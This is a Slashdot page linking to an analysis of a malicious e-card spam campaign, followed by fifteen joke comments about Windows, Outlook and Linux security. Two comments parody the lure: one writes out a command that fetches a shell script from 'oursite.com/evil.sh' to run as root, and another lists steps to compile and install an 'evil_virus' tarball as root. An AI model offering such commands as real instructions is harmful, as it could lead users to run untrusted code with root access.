Slashdot Mirror

← Back to Stories (view on slashdot.org)

Malicious E-Cards - An Analysis of Spam

Posted by Hemos on from the dissecting-the-spam dept.

smashr writes "I ran across this article the other day which is a rather clear analysis of a piece of malicious spam the author received. While most of us simply hit the delete key, the author has taken the time to see exactly what is going on when an innocent user clicks on one of these fake e-cards that are going around. From Russian spyware sites to over-writing wmplayer.exe this particular piece of spam is a rather nasty one."

15 of 482 comments (clear)

  1. You might remember me by Anonymous Coward · · Score: 5, Funny

    Hi. I'm Troy McClure. You might remember me from such e-mail how-to videos as "Nigeria: Your Path to Riches" and "Can I Lengthen my Penis 73 inches if I answer 22 emails?"

  2. Re:It'd be scary if I ran my PC as Administrator.. by clester · · Score: 5, Funny

    You mean it could overwrite /usr/bin/xmms?

    --

    -- Real programmers don't comment their code. It was hard to write, it should be hard to understand.
  3. Re:It'd be scary if I ran my PC as Administrator.. by ggvaidya · · Score: 2, Funny

    oops ... silly me ... obviously, I meant your Microsoft(R) Windows(TM) Media Player. Nope, sorry, the quick file replacement is a feature found only on Microsoft(R) systems. Us poor Linux lusers will have to use 'apt-get install' or other equally slow technique.

  4. Re:Russian spyware. by Chuck+Bucket · · Score: 4, Funny

    you must be new here.

    CB

    --
    free ipod and free gmail!
  5. Re:Turn off HTML viewing in your email client! by Anonymous Coward · · Score: 5, Funny

    But that's a cool feature!

    What next? Should I stop using Outlook???

  6. overwrites wmplayer.exe?? by p4ul13 · · Score: 4, Funny

    Well ok; so it's not ALL bad then.

    --
    Paul Lenhart writes words!
  7. Oh boy... by mog007 · · Score: 3, Funny

    I've got a /. rss feed through a Trillian plug-in, and my window was sized just right to make the title of the article:
    "Malicious E-Cards" - An anal...

    I thought goatse was coming back... in the form of email.

    *Shudder*

    --
    Learn something new.
  8. Yes , indeed! by Viol8 · · Score: 2, Funny

    As a linux user I have to be very careful when I upload windows .exe files just in case they do something nasty like , umm ... use up diskspace
    on my drive? Oh , but perhaps the spammer will get me to run a linux binary and I wouldn't have a clue what was going on as I saved the binary to my disk
    , opened an xterm , typed in its name and ran it? Yes , he'll have me fooled no doubt about that!

  9. Re:Turn off HTML viewing in your email client! by gnu-generation-one · · Score: 5, Funny

    "I've said it before, and it's worth repeating... turn off HTML viewing in your email client, and do it now!... It's an easy way to protect yourself from all sorts of stupid stuff... Ahem, turn off HTML viewing in your email client NOW.

    I misread that as "turn off HTML viewing in your web browser NOW", and wondered why it wasn't marked as funny...

    Well, it would make some things safer...

  10. Re:Turn off HTML viewing in your email client! by FooAtWFU · · Score: 2, Funny

    I don't have HTML viewing available... I use Pine, you insensitive clod!!! ;)

    --
    The World Wide Web is dying. Soon, we shall have only the Internet.
  11. Re:E-cards are EVIL by Anonymous Coward · · Score: 1, Funny

    What's your email address?

  12. Re:It'd be scary if I ran my PC as Administrator.. by cyt0plas · · Score: 3, Funny

    You have received an E-Card. If you're using Outlook[express], you are already infected.

    For unix/linux users, run "exec -o lynx --dump http://oursite.com/evil.sh". This command should be ran as root. You may need to compile lynx from source.

    --
    Contact Me (got tired of viruses emailing me).
  13. Obvious, but too good to miss... by Anonymous Coward · · Score: 2, Funny
    "To view this e-card, please move the attachment to your home directory, then open a konsole window and enter these commands:
    cd ~
    tar xzf evil_virus.tar.gz
    cd evil_virus
    ./configure
    make
    su root (enter your root password when prompted)
    make install
    /usr/local/bin/evil_virus
    Congratulations! Your greetings card will now be displayed!"
  14. Nice Spin, MS by Anonymous Coward · · Score: 5, Funny
    This article describes a new feature that is added to Outlook 2002 in Microsoft Office XP Service Pack 1 (SP-1)... Click Start, and then click Run. In the Open box, type regedit...

    Was the (Cough) "new feature" originally only intended for internal use (where they know how really risky using their own products can be), or is Regedit going to replace menus in future versions of Windows?

  15. Re:I hate ecards by lightspawn · · Score: 2, Funny

    Does anyone else think that our society is overdue on becoming fed up with all these sort of things?

    Our society is fed up with poverty, disease and famine, but there's nothing to be done about those either.

    Microsoft is a huge, rich company. If they can't write secure software it can't be done, and anyway it's always the fault of the bad guys for doing bad stuff, never the fault of the company making it possible in the first place.

    (note - it's not my opinion, but I did talk to Joe Sixpack a few days ago and he said everybody except us geeks agreed that was the case).